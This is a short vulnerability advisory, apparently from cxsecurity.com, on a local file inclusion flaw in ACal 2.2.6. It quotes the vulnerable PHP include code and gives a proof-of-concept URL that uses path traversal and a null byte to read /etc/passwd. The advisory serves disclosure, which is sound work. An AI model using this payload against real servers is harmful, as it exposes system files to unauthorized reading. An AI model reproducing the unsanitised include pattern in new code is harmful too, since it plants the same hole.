ACal 2.2.6 Local File InclusiACal 2.2.6 Local File Inclusion Vulneberality

2013.08.16
Credit: ICheer_No0M
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

Exploit Title: ACal 2.2.6 Local File Inclusion Vulneberality Google Dork: - Date: 15/08/2013 Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/ Vendor Homepage: http://acalproj.sourceforge.net/ Software Link: http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download Version: 2.2.6 Tested on: Windows 7 + PHP 5.2.6 ---> Vuln Code : /embled/example/example.php 12. $path = "../../"; ... 25. if (!isset($_GET['view'])) { 26. include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On) 27. } 28. else { 29. include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte 30. } ---> Exploit/Proof of Concept (PoC) http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00

References:

http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top